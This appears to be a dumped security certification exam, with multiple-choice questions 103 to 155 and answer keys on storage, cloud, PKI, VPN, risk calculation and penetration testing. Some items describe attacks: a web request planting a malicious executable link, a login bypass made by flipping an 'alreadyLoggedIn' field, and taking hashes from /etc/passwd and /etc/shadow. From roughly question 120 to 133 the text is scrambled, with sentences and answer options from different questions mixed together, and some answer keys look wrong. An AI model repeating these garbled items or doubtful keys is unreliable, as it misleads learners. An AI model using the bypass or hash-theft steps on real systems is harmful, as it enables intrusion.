B. Aligning their client intake with the resources available
C. Using a community cloud with adequate controls
D. Outsourcing the service to a third party cloud provider

Correct Answer: C
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 103
A company is deploying a new iSCSI-based SAN. The requirements are as follows:
SAN nodes must authenticate each other.
Shared keys must NOT be used.
Do NOT use encryption in order to gain performance.

Which of the following design specifications meet all the requirements? (Select TWO).

A. Targets use CHAP authentication
B. IPSec using AH with PKI certificates for authentication
C. Fiber channel should be used with AES
D. Initiators and targets use CHAP authentication
E. Fiber channel over Ethernet should be used
F. IPSec using AH with PSK authentication and 3DES
G. Targets have SCSI IDs for authentication

Correct Answer: BD
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 104
Company XYZ provides hosting services for hundreds of companies across multiple industries including healthcare, education, and manufacturing. The security architect

for company XYZ is reviewing a vendor proposal to reduce company XYZ's hardware costs by combining multiple physical hosts through the use of virtualization technologies. The security architect notes concerns about data separation, confidentiality, regulatory requirements concerning PII, and administrative complexity on the proposal. Which of the following BEST describes the core concerns of the security architect?

A. Most of company XYZ's customers are willing to accept the risks of unauthorized disclosure and access to information by outside users.
B. The availability requirements in SLAs with each hosted customer would have to be re-written to account for the transfer of virtual machines between physical platforms for regular maintenance.
C. Company XYZ could be liable for disclosure of sensitive data from one hosted customer when accessed by a malicious user who has gained access to the virtual machine of another hosted customer.
D. Not all of company XYZ's customers require the same level of security and the administrative complexity of maintaining multiple security postures on a single hypervisor negates hardware cost savings.

Correct Answer: C
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 105
A university requires a significant increase in web and database server resources for one week, twice a year, to handle student registration. The web servers remain idle for the rest of the year. Which of the following is the MOST cost effective way for the university to securely handle student registration?

A. Move the web servers to an elastic public cloud while keeping the database servers local.
B. Move the database servers to an elastic private cloud while keeping the web servers local.
C. Move the database servers and web servers to an elastic private cloud.
D. Virtualize the web servers locally to add capacity during registration.

Correct Answer: D
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 106
Due to a new regulatory requirement, ABC Company must now encrypt all WAN transmissions. When speaking with the network administrator, the security administrator learns that the existing routers have the minimum processing power to do the required level of encryption. Which of the following solutions minimizes the performance impact on the router?

A. Deploy inline network encryption devices
B. Install an SSL acceleration appliance
C. Require all core business applications to use encryption
D. Add an encryption module to the router and configure IPSec

Correct Answer: A

Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 107
In order to reduce costs and improve employee satisfaction, a large corporation is creating a BYOD policy. It will allow access to email and remote connections to the corporate enterprise from personal devices, provided they are on an approved device list. Which of the following security measures would be MOST effective in securing the enterprise under the new policy? (Select TWO).

A. Provide free email software for personal devices.
B. Encrypt data in transit for remote access.
C. Require smart card authentication for all devices.
D. Implement NAC to limit insecure devices access.
E. Enable time of day restrictions for personal devices.

Correct Answer: BD
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 108
A security administrator is tasked with implementing two-factor authentication for the company VPN. The VPN is currently configured to authenticate VPN users against a backend RADIUS server. New company policies require a second factor of authentication, and the Information Security Officer has selected PKI as the second factor. Which of the following should the security administrator configure and implement on the VPN concentrator to implement the second factor and ensure that no error messages are displayed to the user during the VPN connection? (Select TWO).

A. The user certificate private key must be signed by the CA.
B. The CA's certificate private key must be installed on the VPN concentrator.
C. The CA's certificate public key must be installed on the VPN concentrator.
D. The VPN concentrator's certificate private key must be signed by the CA and installed on the VPN concentrator.
E. The VPN concentrator's certificate private key must be installed on the VPN concentrator.
F. The user's certificate private key must be installed on the VPN concentrator.

Correct Answer: EF
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 109
Ann, a software developer, wants to publish her newly developed software to an online store. Ann wants to ensure that the software will not be modified by a third party or

end users before being installed on mobile devices. Which of the following should Ann implement to stop modified copies of her software from running on mobile devices?

A. Single sign-on
B. Identity propagation
C. Remote attestation
D. Secure code review

Correct Answer: C
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 110
Two separate companies are in the process of integrating their authentication infrastructure into a unified single sign-on system. Currently, both companies use an AD backend and two factor authentication using TOTP. The system administrators have configured a trust relationship between the authentication backend to ensure proper process flow. How should the employees request access to shared resources before the authentication integration is complete?

A. They should logon to the system using the username concatenated with the 6-digit code and their original password.
B. They should logon to the system using the newly assigned global username: first.lastname#### where #### is the second factor code.
C. They should use the username format: LAN\first.lastname together with their original password and the next 6-digit code displayed when the token button is depressed.
D. They should use the username format: first.lastname@company.com, together with a password and their 6-digit code.

Correct Answer: D
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 111
An industry organization has implemented a system to allow trusted authentication between all of its partners. The system consists of a web of trusted RADIUS servers communicating over the Internet. An attacker was able to set up a malicious server and conduct a successful man-in-the-middle attack. Which of the following controls should be implemented to mitigate the attack in the future?

A. Use PAP for secondary authentication on each RADIUS server
B. Disable unused EAP methods on each RADIUS server
C. Enforce TLS connections between RADIUS servers
D. Use a shared secret for each pair of RADIUS servers

Correct Answer: C
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 112
Joe, the Chief Executive Officer (CEO), was an Information security professor and a Subject Matter Expert for over 20 years. He has designed a network defense method which he says is significantly better than prominent international standards. He has recommended that the company use his cryptographic method. Which of the following methodologies should be adopted?

A. The company should develop an in-house solution and keep the algorithm a secret.
B. The company should use the CEO's encryption scheme.
C. The company should use a mixture of both systems to meet minimum standards.
D. The company should use the method recommended by other respected information security organizations.

Correct Answer: D
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 113
Which of the following BEST constitutes the basis for protecting VMs from attacks from other VMs hosted on the same physical platform?

A. Aggressive patch management on the host and guest OSs.
B. Host based IDS sensors on all guest OSs.
C. Different antivirus solutions between the host and guest OSs.
D. Unique Network Interface Card (NIC) assignment per guest OS.

Correct Answer: A
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 114
Two universities are making their 802.11n wireless networks available to the other university's students. The infrastructure will pass the student's credentials back to the home school for authentication via the Internet. The requirements are:
Mutual authentication of clients and authentication server
The design should not limit connection speeds
Authentication must be delegated to the home school
No passwords should be sent unencrypted

The following design was implemented:
WPA2 Enterprise using EAP-PEAP-MSCHAPv2 will be used for wireless security
RADIUS proxy servers will be used to forward authentication requests to the home school
The RADIUS servers will have certificates from a common public certificate authority

A strong shared secret will be used for RADIUS server authentication

Which of the following security considerations should be added to the design?

A. The transport layer between the RADIUS servers should be secured
B. WPA Enterprise should be used to decrease the network overhead
C. The RADIUS servers should have local accounts for the visiting students
D. Students should be given certificates to use for authentication to the network

Correct Answer: A
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 115
A company with 2000 workstations is considering purchasing a HIPS to minimize the impact of a system compromise from malware. Currently, the company projects a total cost of $50,000 for the next three years responding to and eradicating workstation malware. The Information Security Officer (ISO) has received three quotes from different companies that provide HIPS. The first quote requires a $10,000 one-time fee, an annual cost of $5 per workstation, and a 10% annual support fee based on the number of workstations. The second quote requires a $15,000 one-time fee, an annual cost of $8 per workstation, and a 12% annual fee based on the number of workstations. The third quote has no one-time fee, annual cost of $6 per workstation, and a 15% annual fee based on the number of workstations. Which solution should the company select if the contract is only valid for three years?

A. First quote
B. Second quote
C. Third quote
D. Accept the risk

Correct Answer: B
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 116
Customers are receiving emails containing a link to malicious software. These emails are subverting spam filters. The email reads as follows:

Delivered-To: customer@example.com
Received: by 10.14.120.205 Mon, 1 Nov 2010 11:15:24 -0700 (PDT)
Received: by 10.231.31.193 Mon, 01 Nov 2010 11:15:23 -0700 (PDT)
Return-Path: <IT@company.com>
Received: by 10.0.0.1 for <customer@example.com>, 1 Nov 2010 13:15:14 -0500 (envelope-from <IT@company.com>)

Received: by smtpex.example.com (SMTP READY) with ESMTP (AIO), Mon, 01 Nov 2010 13:15:14 -0500
Received: from 172.18.45.122 by 192.168.2.55, Mon, 1 Nov 2010 13:15:14 -0500
From: Company <IT@Company.com>
To: "customer@example.com" <customer@example.com>
Date: Mon, 1 Nov 2010 13:15:11 -0500
Subject: New Insurance Application
Thread-Topic: New Insurance Application

Please download and install software from the site below to maintain full access to your account.
www.examplesite.com
________________________________

Additional information: The authorized mail servers IPs are 192.168.2.10 and 192.168.2.11. The network's subnet is 192.168.2.0/25.

Which of the following are the MOST appropriate courses of action a security administrator could take to eliminate this risk? (Select TWO).

A. Identify the origination point for malicious activity on the unauthorized mail server.
B. Block port 25 on the firewall for all unauthorized mail servers.
C. Disable open relay functionality.
D. Shut down the SMTP service on the unauthorized mail server.
E. Enable STARTTLS on the spam filter.

Correct Answer: BD
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 117
A web developer is responsible for a simple web application that books holiday accommodations. The front-facing web server offers an HTML form, which asks for a user's age. This input gets placed into a signed integer variable and is then checked to ensure that the user is in the adult age range. Users have reported that the website is not functioning correctly. The web developer has inspected log files and sees that a very large number (in the billions) was submitted just before the issue started occurring. Which of the following is the MOST likely situation that has occurred?

A. The age variable stored the large number and filled up disk space which stopped the application from continuing to function. Improper error handling prevented the application from recovering.
B. The age variable has had an integer overflow and was assigned a very small negative number which led to unpredictable application behavior. Improper error handling prevented the application from recovering.
C. Computers are able to store numbers well above "billions" in size. Therefore, the website issues are not related to the large number being input.
D. The application has crashed because a very large integer has lead to a "divide by zero". Improper error handling prevented the application from recovering.

Correct Answer: B
Section: Mixed Questions

Explanation

Explanation/Reference:

QUESTION 118
A company has decided to change its current business direction and refocus on core business. Consequently, several company sub-businesses are in the process of being sold-off. A security consultant has been engaged to advise on residual information security concerns with a de-merger. From a high-level perspective, which of the following BEST provides the procedure that the consultant should follow?

A. Explain that security consultants are not trained to offer advice on company acquisitions or demergers. This needs to be handled by legal representatives well versed in corporate law.
B. Perform a penetration test for the current state of the company. Perform another penetration test after the de-merger. Identify the gaps between the two tests.
C. Duplicate security-based assets should be sold off for commercial gain to ensure that the security posture of the company does not decline.
D. Identify the current state from a security viewpoint. Based on the demerger, assess what the security gaps will be from a physical, DR, technical, and policy/awareness perspective.

Correct Answer: D
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 119
It has come to the IT administrator's attention that the "post your comment" field on the company blog page has been exploited, resulting in cross-site scripting attacks against customers reading the blog. Which of the following would be the MOST effective at preventing the "post your comment" field from being exploited?

A. Update the blog page to HTTPS
B. Filter metacharacters
C. Install HIDS on the server
D. Patch the web application
E. Perform client side input validation

Correct Answer: B
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 120
A business unit of a large enterprise has outsourced the hosting and development of a new external website which will be accessed by premium customers, in order to speed up the time to market timeline. Which of the following is the MOST appropriate?

A. The external party providing the hosting and website development should be obligated under contract to provide a secure service which is regularly tested (vulnerability

The use of external organizations to provide hosting and web development services is not recommended as the costs are typically higher than what can be achieved internally. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 121 An administrator is tasked with securing several website domains on a web server. D. 3 D. mail.example.000 after the first year. 4 Correct Answer: D Section: Mixed Questions Explanation . An SLA should be in place for the resolution of newly identified vulnerabilities and penetration / vulnerability testing should be conducted regularly. B. An MOU should be in place for the resolution of newly identified vulnerabilities and penetration / vulnerability testing should be conducted regularly. Outsourcing transfers all the risk to the third party. C. However. and www. Which of the following would allow the administrator to secure those domains with a single issued certificate? A. thereby minimizing the cost and any legal obligations. 1 B. compliance with privacy regulations becomes more complex and guaranteed uptimes are difficult to track and measure.000 and a yearly maintenance of $2.org.example.000 in revenue per month and be more secure. How many years until there is a return on investment for this new package? A. The legacy product generates $10. and penetration). SLAs should be in place for the resolution of newly identified vulnerabilities and a guaranteed uptime. archive.000 in revenue a month. The administrator elects to secure www. Wildcard Certificate C. Outsourcing transfers the risk to the third party. Intermediate Root Certificate B. The new software product has an initial cost of $180. 2 C. it will generate $15.example. In addition.example.org with the same certificate. 
Subject Alternative Names Certificate Correct Answer: D Section: Mixed Questions Explanation Explanation/Reference: QUESTION 122 An administrator wishes to replace a legacy clinical software product as it has become a security risk. EV x509 Certificate D.com.com.

Explanation/Reference: QUESTION 123 A large company is preparing to merge with a smaller company. Require Company ABC employees to use two-factor authentication on the required systems D. An ROI calculation should be performed to determine which company's application should be used. Which of the following BEST prevents Company XYZ representatives from gaining access to unauthorized Company ABC systems? A. Which of the following actions should the large company's security administrator take in preparation for the merger? A. The smaller company has been very profitable. Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 124 Which of the following technologies prevents an unauthorized HBA from viewing iSCSI target information? A. Require each Company XYZ employee to use an IPSec connection to the required systems B. D.existence. but the smaller company's main applications were created in-house. C. Data snapshots C. A regression test should be performed on the in-house software to determine security risks associated with the software. B. Require a site-to-site VPN for intercompany communications Correct Answer: B . The representatives reside at Company XYZ's headquarters. LUN masking D. Deduplication B. A security assessment should be performed to establish the risks of integration or co. A review of the mitigations implemented from the most recent audit findings of the smaller company should be performed. Require Company XYZ employees to establish an encrypted VDI session to the required systems C. Storage multipaths Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 125 Company ABC is hiring customer service representatives from Company XYZ.

and 1 full time employee to respond to incidents per year. correlators. Internal employee costs are averaged to be $80. Based on calculating TCO of the two vendor proposals over a 5 year period. Operational expenses for the pharmaceutical company to partner with the vendor are expected to be a 0. having an outsourced solution appears to be more expensive. having an outsourced solution appears cheaper. B. Vendor B: managed service-based solution which can be the outsourcer for the pharmaceutical company's needs. which of the following options is MOST accurate? A. C.000 per year.Section: Mixed Questions Explanation Explanation/Reference: QUESTION 126 A Chief Information Security Officer (CISO) has requested that a SIEM solution be implemented. The web server was not multipathed. B. D.5 full time employee (FTE) to manage the solution. Based on cost alone. causing a costly downtime on the company's primary website. Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: .000. The SAN snapshots were not up-to-date. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 127 A port in a fibre channel switch failed. Operational expenses are expected to be a 0. Which of the following is the MOST likely cause of the downtime? A. having a purchased product solution appears cheaper. C. D.5 FTE per year. The web server iSCSI initiator was down. Based on cost alone. Two vendor proposals have been received: Vendor A: product-based solution which can be purchased by the pharmaceutical company. The CISO wants to know upfront what the projected TCO would be before looking further into this concern. Based on cost alone. storage and management consoles expected to be $150. Based on cost alone. both outsourced an in-sourced solutions appear to be the same. Capital expenses to cover central log collectors.000 per year per FTE. Bundled offering expected to be $100. The SAN replication to the backup site failed.

Which of the following are true statements? (Select TWO). The X509 V3 certificate is expired. Agile development is more secure than Waterfall as it is a more modern methodology which has the advantage of having been able to incorporate security best practices of recent years. C. A. The client-server implements client-server mutual authentication with different certificates. Data de-duplication D. However. B. Agile development is fundamentally less secure than Waterfall due to the lack of formal up. this has been viewed as a successful initiative by the stakeholders as it has improved time-to-market. Correct Answer: D Section: Mixed Questions Explanation Explanation/Reference: QUESTION 129 A vulnerability scanner report shows that a client-server host monitoring solution operating in the credit card corporate environment is managing SSL sessions with a weak algorithm which does not meet corporate policy. B. A. Which of the following is the MOST accurate statement? A. Agile development has different phases and timings compared to Waterfall. The X509 V3 certificate was issued by a non trusted public CA. Overall. Correct Answer: BC Section: Mixed Questions Explanation Explanation/Reference: QUESTION 130 Which of the following represents important technical controls for securing a SAN storage infrastructure? (Select TWO). some staff within the security team have contended that Agile development is not secure. Port scanning . D. Storage pool space allocation E. The client-server handshake is configured with a wrong priority. C. Agile and Waterfall approaches have the same effective level of security posture. RAID configuration C. Synchronous copy of data B. Security activities need to be adapted and performed within relevant Agile phases.QUESTION 128 An internal development team has migrated away from Waterfall development to use Agile development. They both need similar amounts of security effort at the same phases of development. E. 
The client-server handshake is based on TLS authentication. The client-server handshake could not negotiate strong ciphers.front design and inability to perform security reviews. F. D.

Implementing 802. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 133 Joe is a security architect who is tasked with choosing a new NIPS platform that has the ability to perform SSL inspection. the security architect wants to outsource identity proofing and second factor digital delivery to the third party. While reviewing the data collected by the protocol analyzer. C. can be centrally .F. Which of the following solutions will address the enterprise requirements? A. LUN masking/mapping G. Implementing federated network access with the third party. Using a HSM at the network perimeter to handle network device access. Full disk encryption should be enabled across the enterprise to ensure the confidentiality of sensitive data. Database record encryption should be used when storing sensitive information on virtual servers. C. In order to reduce costs and administrative overhead. D. A separate physical interface placed on a private VLAN should be configured for live host operations. D. the security administrator notices that sensitive data is present in the packet capture. Port mapping Correct Answer: FG Section: Mixed Questions Explanation Explanation/Reference: QUESTION 131 An enterprise must ensure that all devices that connect to its networks have been previously approved. The solution must support dual factor mutual authentication with strong identity assurance. Which of the following should the security administrator recommend to ensure the confidentiality of sensitive information during live VM migration. analyze up to 10Gbps of traffic. while minimizing latency issues? A. Correct Answer: D Section: Mixed Questions Explanation Explanation/Reference: QUESTION 132 A security administrator is performing VDI traffic data collection on a virtual server which migrates from one host to another. B. Sensitive data should be stored on a backend SAN which uses an isolated fiber channel network. 
Using a VPN concentrator which supports dual factor via hardware tokens. B.1x with EAP-TTLS across the infrastructure.

com/badcontent/exploitme. BYOD and cloud storage prior to purchasing the product. "marketingCookieTracker":"JSESSIONID=000000001" "returnCode":"Account added successfully" } Which of the following are security weaknesses in this example? (Select TWO).exe"} ]. Test the product and make a product recommendation. interview existing customers of the product and then recommend that the product be purchased. Contribute to an RFP and then evaluate RFP responses to ensure that the vendor product meets all mandatory requirements. Ensure that the NIPS platform can also deal with recent technological advancements. Research new technology vendors to look for potential products.managed and only reveals inspected application payload data to specified internal security employees.1 200 OK { "newAccountDetails": [ { "cardNumber":"1234123412341234"} { "cardExpiry":"2020-12-31"} { "cardCVV":"909"} ].example. . B. "customer": [ { "name":"Joe Citizen"} { "custRef":"3153151"} ] } The banking website responds with: HTTP/1. such as threats emerging from social media. Research industry surveys. Choose a popular NIPS product and then consider outsourcing the ongoing device management to a cloud provider. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 134 A penetration tester is inspecting traffic on a new mobile banking application and sends the following web request: POST http://www.com/resources/NewBankAccount HTTP/1. D. Which of the following steps should Joe take to reach the desired outcome? A.example. Evaluate relevant RFC and ISO standards to choose an appropriate vendor product. Consider outsourcing the product evaluation and ongoing management to an outsourced provider on the basis that each of the requirements are met and a lower total cost of ownership (TCO) is achieved. E. Give access to internal security employees so that they can inspect the application payload data. 
C.1 Content-type: application/json { "account": [ { "creditAccount":"Credit Card Rewards account"} { "salesLeadRef":"www.

She has intercepted the following HTTP request: POST /login. Attempt to brute force all usernames and passwords using a password cracker . Reconnaissance tools C. A. HTTP interceptor E. Password cracker Correct Answer: DE Section: Mixed Questions Explanation Explanation/Reference: QUESTION 136 Ann is testing the robustness of a marketing website through an intercepting proxy.aspx from POST to GET B. Vulnerable to malware file uploads F.aspx HTTP/1. Vulnerability scanner F.1 Host: comptia. Network enumerator D. is tasked with testing the security robustness of the protocol between a mobile web application and a RESTful application server. Missing input validation on some fields B.A.org Content-type: text/html txtUsername=ann&txtPassword=ann&alreadyLoggedIn=false&submit=true Which of the following should Ann perform to test whether the website is susceptible to a simple authentication bypass? A. Jailbroken mobile device B. Vulnerable to XSS E. Sensitive details communicated in clear-text D. Which of the following security tools would be required to assess the security between the mobile web application and the RESTful application server? (Select TWO). Vulnerable to SQL injection C. a penetration tester. Remove all of the post data and change the request to /login. JSON/REST is not as secure as XML Correct Answer: AC Section: Mixed Questions Explanation Explanation/Reference: QUESTION 135 Joe.

C. Ensure hypervisor layer firewalling between all VM hosts regardless of security zone. C. A. A security design is performed at the end of the requirements phase Correct Answer: AD Section: Mixed Questions Explanation Explanation/Reference: QUESTION 138 ABC Corporation uses multiple security zones to protect systems and information. D. Organize VM hosts into containers based on security zone and restrict access using an ACL. Remove the txtUsername and txtPassword post data and toggle submit from true to false Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 137 An organization has implemented an Agile development process for front end web application development. For each major iteration penetration testing is performed E. Remove the txtPassword post data and change alreadyLoggedIn from false to true D. Daily stand-up meetings are held to ensure security requirements are understood D. Each zone has different VM administrators. Security standards and training is performed as part of the project C. Maintain a separate virtual switch for each security zone and ensure VM hosts bind to only the correct virtual NIC(s). B. Which of the following activities MUST be mandated to ensure code quality from a security perspective? (Select TWO). and all of the VM hosts are part of a consolidated VM infrastructure. Security requirements are story boarded and make it into the build F. Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: . A new security architect has just joined the company and wants to integrate security activities into the SDLC. Which of the following restricts different zone administrators from directly accessing the console of a VM host from another zone? A. Require multi-factor authentication when accessing the console at the physical VM host. Static and dynamic analysis is run as part of integration B.

Establish a list of users that must work with each regulation B. Use RC4 with Fixed IV generation D. Establish a company framework F. Which of the following would BEST allow the organization to achieve compliance and ensure security? (Select THREE). Use AES in Electronic Codebook mode B. Brute force attack . The application designers have asked that the algorithm support the transport encryption with the lowest possible performance overhead. Use AES in Counter mode Correct Answer: EF Section: Mixed Questions Explanation Explanation/Reference: QUESTION 140 ABC Company must achieve compliance for PCI and SOX. Online password testing B. A. A. Dictionary attack D. Apply technical controls to meet compliance with the regulation Correct Answer: BDF Section: Mixed Questions Explanation Explanation/Reference: QUESTION 141 A pentester must attempt to crack passwords on a windows domain that enforces strong complex passwords. Use AES with cipher text padding E. Establish a list of devices that must meet each regulation C. Centralize management of all devices on the network D. Compartmentalize the network E. Rainbow tables attack C. Which of the following recommendations would BEST meet the needs of the application designers? (Select TWO). Which of the following would crack the MOST passwords in the shortest time period? A. Use RC4 with a nonce generated IV F. Use RC4 in Cipher Block Chaining mode C. The application utilizes streaming video that can be viewed both on computers and mobile devices.QUESTION 139 A security administrator has been asked to select a cryptographic algorithm to meet the criteria of a new application.

D. Create a custom standard to define the data. and phone numbers.Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 142 A security analyst. Law enforcement has requested that the user continue to operate on the network as normal. Implement a de facto corporate standard for all analyzed data. Use well formed standard compliant XML and strict schemas. The security administrator instead suggests that the developers: A. However. B. as well as occasional chunks of data in unpredictable formats. Additionally. The developers want to construct a new data format and create custom tools to parse and process the data. Only document the data format in the parsing application code. Which of the following is evidence that would aid Ann in making a case to management that action needs to be taken to safeguard these servers? A. Ann. Which of the following will BEST meet the goals of law enforcement? . Provide a report of all the IP addresses that are connecting to the systems and their locations B. states that she believes Internet facing file transfer servers are being attacked. Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 144 A user is suspected of engaging in potentially illegal activities. The systems must exchange large amounts of fixed format data such as names. Provide a report showing the file transfer logs of the servers D. Establish alerts at a certain threshold to notify the analyst of high activity C. Compare the current activity to the baseline of normal activity Correct Answer: D Section: Mixed Questions Explanation Explanation/Reference: QUESTION 143 A recently hired security administrator is advising developers about the secure integration of a legacy in-house application with a new cloud based processing system. addresses. the law enforcement agency has requested that the user's ongoing communication be retained in the user's account for future investigations. 
they would like to have a copy of any communications from the user involving certain key terms. C.

Spending on SCADA security controls should stay steady. . and PC boot loader protection research should increase by 100%. Next. A. Perform an e-discover using the applicable search terms. A penetration tester must attempt to retrieve password hashes. Begin a chain-of-custody on for the user's communication. Over the same time period. /etc/password E. B. the growth in the number of PC boot loader attacks has grown exponentially. application control spending should increase substantially and spending on PC boot loader controls should increase substantially. back up the user's email for a future investigation. /etc/shadow C. /etc/passwd B. and spending on PC boot loader protections should remain steady. Starting two years ago. Spending all controls should increase by 15% to start. Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 145 An administrator has enabled salting for users' passwords on a UNIX box. application control spending should increase slightly. Analysis of these trends would seem to suggest which of the following strategies should be employed? A. Next. application control spending should decrease slightly and spending on PC boot loader protections should increase substantially. place a legal hold on the user's email account. D. Next. Which of the following files must the penetration tester use to eventually obtain passwords on the system? (Select TWO). Perform a back up of the user's email account. B. Place a legal hold on the user's email account. the number of attacks against applications has decreased or stayed flat each year. /etc/security D. but that this year's growth has slowed to around 7%. Next. /bin/bash Correct Answer: AB Section: Mixed Questions Explanation Explanation/Reference: QUESTION 146 The latest independent research shows that cyber attacks involving SCADA systems grew an average of 15% per year in each of the last four years.A. spending on application controls should be suspended. C. 
Spending on SCADA security controls should increase by 15%. /sbin/logon F. Spending on SCADA protections should stay steady. perform e-discovery searches to collect applicable emails. C. the incidence of PC boot loader or BIOS based attacks was negligible. export the applicable emails that match the search terms. At the start of the measure period. D.

The patch management system is causing the devices to be noncompliant after issuing the latest patches. Verify the MD5 checksum of system binaries. C. F. D. B. The audit discovers that 40 percent of the desktops do not meet requirements. the company is audited for compliance to regulations. Which of the following is the MOST likely cause of the noncompliance? A. 40 percent of the devices use full disk encryption. Check log files for logins from unauthorized IPs. The devices are being modified and settings are being overridden in production. D. E. C. Use gpg to encrypt compromised data files. Check /proc/kmem for fragmented memory segments. Use vmstat to look for excessive disk I/O. The desktop applications were configured with the default username and password. Check for unencrypted passwords in /etc/shadow. Six months later. Correct Answer: ADG Section: Mixed Questions Explanation Explanation/Reference: QUESTION 148 During a new desktop refresh. G. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 149 A company that must comply with regulations is searching for a laptop encryption product to use for its 40. Check timestamps for files modified around time of compromise. all hosts are hardened at the OS level before deployment to comply with policy.000 end points.Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 147 Which of the following would be used in forensic analysis of a compromised Linux system? (Select THREE). A. H. Use lsof to determine files with future timestamps. B. The product must meet regulations but also be .

The CEO highlighted that code base confidentiality is of critical importance to allow the company to exceed the competition in terms of the product's reliability. Which of the following implementations would BEST meet the needs? A. D. Sign a MOU with a marketing firm to preserve the company reputation and use in-house resources for random testing. B. Sign a NDA with a large security consulting firm and use the firm to perform Grey box testing and address all findings. Correct Answer: C . Commercially available software packages are often widely available.flexible enough to minimize overhead and support in regards to password resets and lockouts. A container-based encryption product that allows the end users to select which files to encrypt C. Which of the following is the BEST description of why this is true? A. Information concerning vulnerabilities is often ignored by business managers. and performance. C. B. Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 151 A firm's Chief Executive Officer (CEO) is concerned that IT staff lacks the knowledge to identify complex vulnerabilities that may exist in a payment system being internally developed. A partition-based software encryption product with a low-level boot protection and authentication B. Commercially available software packages are typically well known and widely available. The payment system being developed will be sold to a number of organizations and is in direct competition with another leading product. Information concerning vulnerabilities and viable attack patterns are never revealed by the developer to avoid lawsuits. Commercially available software packages are not widespread and are only available in limited areas. D. Commercially available software packages are well known and widely available. Information concerning vulnerabilities and viable attack patterns are always shared within the IT community. 
Which of the following would provide the MOST thorough testing and satisfy the CEO's requirements? A. Sign a BPA with a small software consulting firm and use the firm to perform Black box testing and address all findings. Information concerning vulnerabilities is often kept internal to the company that developed the software. A file-based encryption product using profiles to target areas on the file system to encrypt Correct Answer: D Section: Mixed Questions Explanation Explanation/Reference: QUESTION 150 A company decides to purchase commercially available software packages. Use the most qualified and senior developers on the project to perform a variety of White box testing and code reviews. A full-disk hardware-based encryption product with a low-level boot protection and authentication D. C. This can introduce new security risks to the network. stability.

The company implements a fully virtualized datacenter and terminal server access with two-factor authentication for customer access to the administrative website. D. Which of the following has MOST likely occurred? A.168.192.000 C.0/24 HR network 192. A hypervisor server was left un-patched and an attacker was able to use a resource exhaustion attack to gain unauthorized access. B.0/24 User network . $8.000 has an exposure factor of eight percent and an ARO of four.0/24 Datacenter 192.168. C.168.Section: Mixed Questions Explanation Explanation/Reference: QUESTION 152 A company provides on-demand cloud computing resources for a sensitive project.168.2. An employee with administrative access to the virtual guests was able to dump the guest memory onto a mapped disk. $2.11) VPN network 192.5.1. Which of the following figures is the system's SLE? A. $32.0/24 (FTP server is 192.000 D. Company B is not in the same industry as company A and the two are not competitors.5. Both VMs were left unsecured and an attacker was able to exploit network vulnerabilities to access each and move the data. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 153 A system worth $100. Additional network information: DMZ network 192.0/24\ . The security administrator at the company has uncovered a breach in data confidentiality.168.000 B.3. $12. A stolen two factor token was used to move data from one virtual guest to another host on the same network segment.4.000 Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 154 VPN users cannot access the active FTP server through the router but can access any server in the data center.168. Sensitive data from customer A was found on a hidden directory within the VM of company B.

0/24 Permit 192.1.2. Add a permit statement to allow traffic from 192.0/24 192.168.2.168.1.5.168.3.1/32 192.5.168.3. IPS is blocking traffic and needs to be reconfigured D.0/24 192.0/24 Permit 192.168.1.4.0/24 Deny any any Which of the following solutions would allow the users to access the active FTP server? A.168.0/24 192.1.0/24 Permit 192.168.0/24 Permit 192.168.0/24 Deny 192.168.168.168.0/24 to the VPN network B.168. Increase bandwidth limit on the VPN network Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 155 Company policy requires that all company laptops meet the following baseline requirements: Software requirements: Antivirus Anti-malware Anti-spyware Log monitoring Full-disk encryption Terminal services enabled for RDP Administrative access for local users .1.Traffic shaper configuration: VLAN Bandwidth Limit (Mbps) VPN 50 User 175 HR 250 Finance 250 Guest 0 Router ACL: Action Source Destination Permit 192.0/24 192.168.0/24 192.168.1 from the VPN network C.168. Configure the traffic shaper to limit DMZ traffic E.1.5.168.1.1.4.0/24 192.5.0/24 Permit 192.0/24 192. Add a permit statement to allow traffic to 192.0/24 Deny 192.168.168.

